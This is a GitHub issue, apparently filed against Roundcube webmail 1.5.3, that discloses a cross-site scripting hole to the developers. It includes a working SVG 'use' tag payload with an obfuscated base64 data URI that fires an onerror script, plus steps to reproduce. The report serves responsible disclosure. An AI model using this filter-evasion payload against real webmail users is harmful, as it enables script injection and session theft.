Skip to content

XSS with svg use tag on RC 1.5.3 #9168

Closed
@progsmile

Description

@progsmile

Hello dear developers!
Next sample shows me XSS. Would be pleased if you could check it on latest Roundcube version.

Reproduce:

  1. Send html to your mailbox with following content
    <svg><use href="dAta:image/s	vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">

This is encoded string to base64 that you see above:

<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>
  1. Ensure browser alerts with "234"

Env

RoundCube version: 1.5.3
Browsers: Google Chrome (Version 117.0.5938.62), Mozila Firefox (117.0.1 (64-bit))

Thanks!

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions